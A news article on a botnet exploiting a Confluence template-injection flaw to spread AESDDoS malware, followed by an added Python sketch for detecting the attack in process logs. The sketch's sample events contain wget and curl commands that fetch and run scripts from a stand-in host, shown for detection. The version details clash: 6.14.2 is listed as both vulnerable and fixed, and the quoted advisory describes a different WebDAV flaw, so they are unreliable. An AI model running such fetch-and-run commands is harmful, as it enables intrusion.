Atlassian Confluence under botnet attack

Upgrade to avoid AESDDoS malware infestations.

A large botnet is currently targeting vulnerable versions of Atlassian's Confluence collaboration server and trying to abuse them for distributed denial of service attacks, remote code execution and crypto-currency mining, researchers warn.

Security vendor Trend Micro said its honeypots caught a variant of the AESDDoS malware that exploits a critical server-side template injection vulnerability in the Confluence Widget Connector macro.

Atlassian issued a security advisory on March 20, along with patches for Confluence Server and Confluence Data Centre. Versions 6.6.0-6.6.11, 6.7.0-6.12.2, 6.13.0-6.13.2 and 6.14.0-6.14.2 are all vulnerable, Atlassian said.

The fixed versions are 6.6.12, 6.12.3, 6.13.3 and 6.14.2 and later.

"A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance," Atlassian wrote in its security advisory.

Trend Micro said it saw an attacker exploit the vulnerability by remotely executing a shell command to download and run a malicious script; this would download another script that installed a variant of AESDDoS.

AESDDoS can launch an array of DDoS attacks and receive remote shell commands, as well as exfiltrate system information to be used by the malware variant to load crypto-currency miners onto infected machines.

The malware is also called Dofloo.iataq and Flooder-PI by other security vendors.
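
The infection chain Trend Micro describes (a shell command run by the server that downloads and runs a script, which then downloads a second one) can be hunted for in process-creation logs by following children of the Confluence JVM. The sketch below is an added example, not code from Trend Micro or Atlassian; the JSON event format, the `confluence` service account name and the sample events are assumptions constructed for illustration.

```python
import json
import re

# Constructed process-creation events (not taken from any vendor report).
# The JSON field names are an assumed export format from an EDR or audit tool.
SAMPLE_EVENTS = """\
{"pid": 4101, "ppid": 900, "parent": "java", "user": "confluence", "cmdline": "/bin/sh -c wget -q http://198.51.100.7/a.sh -O /tmp/a.sh"}
{"pid": 4102, "ppid": 4101, "parent": "sh", "user": "confluence", "cmdline": "sh /tmp/a.sh"}
{"pid": 4103, "ppid": 4102, "parent": "sh", "user": "confluence", "cmdline": "curl -s http://198.51.100.7/b.sh -o /tmp/b.sh"}
{"pid": 4200, "ppid": 900, "parent": "java", "user": "confluence", "cmdline": "/usr/bin/hostname"}
{"pid": 4300, "ppid": 1, "parent": "sshd", "user": "admin", "cmdline": "curl -O https://example.com/backup.tar"}
"""

SERVICE_USER = "confluence"  # assumed service account running Confluence
APP_PARENT = "java"          # Confluence runs inside a JVM
SHELL = re.compile(r"(^|/)(sh|bash|dash)(\s|$)")
FETCH = re.compile(r"(^|[\s/;|&])(wget|curl)\s")


def find_suspicious(lines):
    """Return (pid, reason) for shells/downloaders descended from the app server."""
    tracked = set()  # pids known to descend from the Confluence JVM
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        from_app = ev["parent"] == APP_PARENT and ev["user"] == SERVICE_USER
        if not (from_app or ev["ppid"] in tracked):
            continue  # unrelated process tree, e.g. an admin's SSH session
        tracked.add(ev["pid"])
        reasons = []
        if SHELL.search(ev["cmdline"]):
            reasons.append("shell")
        if FETCH.search(ev["cmdline"]):
            reasons.append("download")
        if reasons:
            alerts.append((ev["pid"], "+".join(reasons)))
    return alerts


if __name__ == "__main__":
    for pid, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} reason={reason}")
```

Events must be fed in chronological order so that a child is seen after its parent; the administrator's own `curl` over SSH is ignored because it is outside the server's process tree.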

Copyright © iTnews.com.au . All rights reserved.